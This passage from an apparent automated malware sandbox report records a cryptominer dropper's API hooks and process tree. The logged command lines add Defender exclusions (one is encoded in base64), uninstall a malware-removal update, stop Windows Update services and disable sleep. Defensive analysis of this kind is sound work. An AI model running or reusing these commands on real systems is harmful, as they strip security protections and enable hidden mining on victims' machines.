                      ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                      ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                      Processes

                      Process: explorer.exe, Module: ntdll.dll
                      Function NameHook TypeNew Data
                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                      Process: winlogon.exe, Module: ntdll.dll
                      Function NameHook TypeNew Data
                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:10:09:10
                      Start date:07/01/2025
                      Path:C:\Users\user\Desktop\kx new.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\kx new.exe"
                      Imagebase:0x400000
                      File size:10'948'608 bytes
                      MD5 hash:D9D13FA25E880665FB471A4BE57C494C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:10:09:10
                      Start date:07/01/2025
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
                      Imagebase:0xe20000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:10:09:10
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:10:09:10
                      Start date:07/01/2025
                      Path:C:\Users\user\AppData\Local\Temp\Kawpow new.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
                      Imagebase:0x7ff7dd370000
                      File size:5'471'744 bytes
                      MD5 hash:FB6A3B436E9F9402937D95F755B62F91
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 74%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:5
                      Start time:10:09:11
                      Start date:07/01/2025
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Imagebase:0x7ff6cb6b0000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:10:09:11
                      Start date:07/01/2025
                      Path:C:\Users\user\AppData\Local\Temp\xmr new.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Local\Temp\xmr new.exe"
                      Imagebase:0x7ff7a4db0000
                      File size:5'471'744 bytes
                      MD5 hash:7D6398EBFB82A24748617189BF4AD691
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 74%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:7
                      Start time:10:09:11
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:10:09:12
                      Start date:07/01/2025
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Imagebase:0x7ff6cb6b0000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:10:09:12
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:10
                      Start time:10:09:13
                      Start date:07/01/2025
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff605670000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:11
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Imagebase:0x7ff7f26b0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:14
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Imagebase:0x7ff7f26b0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:15
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:16
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:17
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:18
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:19
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\wusa.exe
                      Wow64 process (32bit):false
                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                      Imagebase:0x7ff7749c0000
                      File size:345'088 bytes
                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:20
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\wusa.exe
                      Wow64 process (32bit):false
                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                      Imagebase:0x7ff7749c0000
                      File size:345'088 bytes
                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:21
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:22
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:23
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:24
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:25
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:26
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:27
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:28
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:29
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop bits
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:30
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:31
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop bits
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:32
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:33
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:34
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:35
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:36
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:37
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:38
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:39
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:40
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:41
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:42
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:43
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:44
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:45
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\dialer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\dialer.exe
                      Imagebase:0x7ff7fd750000
                      File size:39'936 bytes
                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      General

                      Target ID:46
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:47
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:48
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:49
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:50
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe delete "CKTJZLMO"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:51
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:52
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\dialer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\dialer.exe
                      Imagebase:0x7ff7fd750000
                      File size:39'936 bytes
                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:53
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:54
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:55
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:56
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe delete "CKTJZLMO"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:57
                      Start time:10:09:19
                      Start date:07/01/2025
